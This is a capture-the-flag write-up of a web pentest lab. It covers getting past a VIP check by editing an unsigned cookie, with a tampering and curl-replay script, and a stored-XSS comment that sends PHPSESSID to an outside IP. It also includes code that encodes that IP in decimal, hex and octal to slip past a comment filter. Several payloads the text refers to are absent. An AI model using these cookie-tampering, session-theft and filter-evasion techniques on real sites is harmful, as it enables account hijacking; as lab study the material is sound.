Web Application Pentest Section

80 points - Only VIP and registered users are allowed to view the Blog. Become VIP to gain access to the Blog to reveal the hidden flag.
Looking at the web page, we notice on the first visit that the link to the "Blog" is disabled. Somehow we need to re-enable the link to get the flag.
Notice that among the cookies returned is vip=0. Given that, it is reasonable to suppose that a VIP user carries a value other than 0. Changing it to 1 enables the link to the Blog, and clicking the Blog link then reveals the flag. The access decision is made entirely from an unsigned, client-controlled cookie, so nothing on the server stops the client from rewriting it.
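The same cookie flip done outside the browser, as an added example that is not part of the original write-up. The Set-Cookie header values, host name and path are constructed for the demonstration; only the cookie name vip and the values 0 and 1 come from the challenge. The script parses the cookies the server sets, overwrites vip, and emits the equivalent curl replay.

```python
"""Flip the vip=0 cookie and build the replayed request.

Added example for this write-up, not code from the original post. The
Set-Cookie headers, host and path below are constructed; only the cookie
name vip and the values 0/1 come from the challenge.
"""
from http.cookies import SimpleCookie

# Constructed: what the first response from the page might carry.
SAMPLE_SET_COOKIE = [
    "PHPSESSID=0123456789abcdef; path=/; HttpOnly",
    "vip=0; path=/",
]


def parse_set_cookie(headers):
    """Collect name -> value from a list of Set-Cookie header values."""
    jar = {}
    for header in headers:
        cookie = SimpleCookie()
        cookie.load(header)
        for name, morsel in cookie.items():
            jar[name] = morsel.value
    return jar


def tamper(jar, name="vip", value="1"):
    """Return a copy of the jar with the access-control cookie overwritten.

    The server decides access purely from this client-supplied value, so
    rewriting it is all that is needed. Refuse to guess if it is absent.
    """
    if name not in jar:
        raise KeyError(f"server never set a {name!r} cookie")
    new_jar = dict(jar)
    new_jar[name] = value
    return new_jar


def cookie_header(jar):
    """Serialise the jar into a single Cookie request header value."""
    return "; ".join(f"{k}={v}" for k, v in jar.items())


def curl_command(url, jar):
    """Equivalent curl replay; the URL is a placeholder, not the challenge host."""
    return f"curl -s -b '{cookie_header(jar)}' '{url}'"


if __name__ == "__main__":
    original = parse_set_cookie(SAMPLE_SET_COOKIE)
    print("server set:", cookie_header(original))
    print("we send   :", curl_command("http://target.example/blog", tamper(original)))
```

In the browser the same edit is a one-line change in the developer tools' storage tab; the point is that the server accepts whatever the client presents, since the cookie is neither signed nor tied to a server-side session attribute.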
160 points - Gain access to the Blog as a registered user to reveal the hidden flag.
The blog allows you to insert comments, so I checked whether XSS is possible when a comment is inserted. Below the textbox there are controls to make text bold or italic and to add a link. On testing the link feature, the link title turned out to be where the XSS payload can be placed.
The script above was filtered and not posted as a comment, so I tried a different encoding (URL encoding).
That was still caught: the filter matched the IP address even when it was URL-encoded. I needed another way to encode the IP address and found the following:
This is interesting. The link on that page appears as follows:
<a id="ctl00_ctl00_WholeBody_ContentPane_ContentArea_Body_encCrazyIp" href="http://2886755841" style="font-weight:bold;">2886755841</a>
Below is a Python script I found (adapted to Python 3) to convert an IP address to its decimal (dword) encoding. struct.unpack returns a tuple, so the first element is taken to print the bare number:
#!/usr/bin/python3
import socket, struct
# Pack the dotted quad into four network-order bytes and read them back
# as one unsigned 32-bit integer: 172.16.102.1 -> 2886755841
print(struct.unpack("!I", socket.inet_aton("172.16.102.1"))[0])
With the encoded IP address I changed the comment to the following; however, I noticed that the comment is truncated at just over 50 characters:
So the following does pull the PHPSESSID:
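An added example, not code from the original write-up, that generalises the one-line struct trick above: it produces the dotless decimal form the challenge used, plus the hex and per-octet octal forms browsers also accept for a host, decodes each form back to dotted decimal to verify it, and models the comment filter as a dotted-quad regex. That regex is an assumption about how the challenge filter behaved (the page only reports that the dotted and URL-encoded forms were blocked and the decimal form was not); the IP 172.16.102.1 and its decimal value 2886755841 are the page's own.

```python
"""IP-address host encodings that a dotted-quad filter does not recognise.

Added example for this write-up, not code from the original post. It
generalises the struct trick to the hex and octal host forms browsers also
accept, decodes each form back for verification, and models the comment
filter as a dotted-quad regex (an assumption about the challenge filter).
"""
import re
import socket
import struct

# Assumed filter: rejects any comment containing a dotted-quad IPv4 address.
DOTTED_QUAD = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def ip_to_decimal(ip):
    """172.16.102.1 -> 2886755841 (network-order bytes read as one uint32)."""
    return struct.unpack("!I", socket.inet_aton(ip))[0]


def decimal_to_ip(n):
    """Inverse of ip_to_decimal."""
    return socket.inet_ntoa(struct.pack("!I", n))


def ip_to_hex(ip):
    """Dotless hex form, e.g. 0xac106601."""
    return "0x%08x" % ip_to_decimal(ip)


def ip_to_octal(ip):
    """Per-octet octal with a leading zero, e.g. 0254.020.0146.01."""
    return ".".join("0%o" % int(octet) for octet in ip.split("."))


def _component(part):
    """Parse one host component as URL parsers do: 0x hex, leading 0 octal, else decimal."""
    if part.lower().startswith("0x"):
        return int(part[2:] or "0", 16)
    if len(part) > 1 and part.startswith("0"):
        return int(part, 8)
    return int(part, 10)


def decode_host(host):
    """Turn a dotless or four-part numeric host back into dotted decimal."""
    parts = host.split(".")
    if len(parts) == 1:
        value = _component(parts[0])
        if value > 0xFFFFFFFF:
            raise ValueError("dotless value exceeds 32 bits")
        return decimal_to_ip(value)
    if len(parts) == 4:
        octets = [_component(p) for p in parts]
        if any(o > 255 for o in octets):
            raise ValueError("octet out of range")
        return decimal_to_ip(int.from_bytes(bytes(octets), "big"))
    raise ValueError("only dotless and four-part hosts are handled here")


def filter_blocks(comment):
    """True if the assumed dotted-quad filter would reject this comment."""
    return DOTTED_QUAD.search(comment) is not None


if __name__ == "__main__":
    ip = "172.16.102.1"
    for form in (ip, str(ip_to_decimal(ip)), ip_to_hex(ip), ip_to_octal(ip)):
        url = f"http://{form}/"
        print(f"{url:28} -> {decode_host(form)}  blocked={filter_blocks(url)}")
```

The decimal form is also the shortest of the alternatives, which matters once the comment field is cut off at around 50 characters: every byte saved on the host leaves room for the rest of the payload.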
220 points - Retrieve the hidden flag from the database.
260 points - Retrieve the hidden flag by gaining access to the caching control panel.
280 points - Reveal the final flag, which is hidden in the /flag.txt file on the web server.